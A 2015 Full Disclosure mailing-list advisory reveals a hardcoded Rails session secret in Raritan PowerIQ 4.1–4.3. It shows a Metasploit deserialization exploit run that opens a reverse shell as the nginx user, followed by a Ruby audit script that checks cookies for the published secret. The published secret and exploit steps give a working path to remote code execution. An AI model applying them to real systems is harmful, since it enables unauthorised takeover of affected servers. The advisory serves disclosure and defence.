Message-ID: <CAOJKFBDMLsGYDCCkLA3m4Cz+y+UBqmfGw4cGiNXB3C43PQHztQ@mail.gmail.com>
Date: Wed, 11 Mar 2015 19:57:17 -0500
From: Brandon Perry <bperry.volatile@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Raritan PowerIQ known session secret

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   COOKIE_NAME                                                no        The name of the session cookie
   DIGEST_NAME      SHA1                                      yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                       yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                         yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                              yes       The target address
   RPORT            443                                       yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes       The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  yes       The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537          yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                              yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                      no        Only send the payload if the session cookie is validated
   VHOST                                                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
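The cookie validation step the exploit run above relies on ("SECRET matches!"), recast as a defender's audit check. This is an added example, not code from the advisory author or from Raritan: it takes a URL-decoded Rails 2/3 `_session_id` cookie value and reports whether its HMAC-SHA1 signature was produced with the secret quoted in the advisory, so an administrator can confirm whether a PowerIQ instance still runs on the shipped secret after a supposed rotation. The issue_cookie helper only mimics how a Rails CookieStore signs a session, to build a constructed sample.

```ruby
require 'openssl'

# Session secret shipped with the affected PowerIQ releases, as quoted in the advisory.
KNOWN_SECRET = '8e238c9702412d475a4c44b7726a0537'

# Compare two digests in constant time so the audit tool itself does not leak timing.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# A Rails 2/3 CookieStore session is "base64(Marshal.dump(hash))--hex(HMAC-SHA1(secret, base64))".
# Returns :not_rails_cookie, :known_secret or :other_secret. Never calls Marshal.load:
# deserialising attacker-controlled cookie data is exactly the step the exploit abuses.
def audit_session_cookie(cookie, secret = KNOWN_SECRET)
  data, digest = cookie.to_s.split('--', 2)
  return :not_rails_cookie if data.nil? || digest.nil? || digest !~ /\A[0-9a-f]{40}\z/
  # Marshal 4.8 payloads start with bytes 0x04 0x08; anything else is not a Rails marshal session.
  return :not_rails_cookie unless data.unpack1('m').start_with?("\x04\x08".b)
  expected = OpenSSL::HMAC.hexdigest('SHA1', secret, data)
  secure_compare(expected, digest) ? :known_secret : :other_secret
end

# Mimics how the Rails app signs a session; used here only to construct a sample cookie.
def issue_cookie(session_hash, secret)
  data = [Marshal.dump(session_hash)].pack('m0')
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, data)}"
end

if __FILE__ == $0
  # Constructed sample: the kind of cookie a default install would set.
  sample = issue_cookie({ 'session_id' => 'constructed', 'return_to' => '/' }, KNOWN_SECRET)
  puts "default secret: #{audit_session_cookie(sample)}"            # known_secret
  puts "rotated secret: #{audit_session_cookie(sample, 'rotated')}" # other_secret
end
```

A result of :known_secret for a cookie captured from your own instance means the deployment is still signing sessions with the published value and the secret must be rotated.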
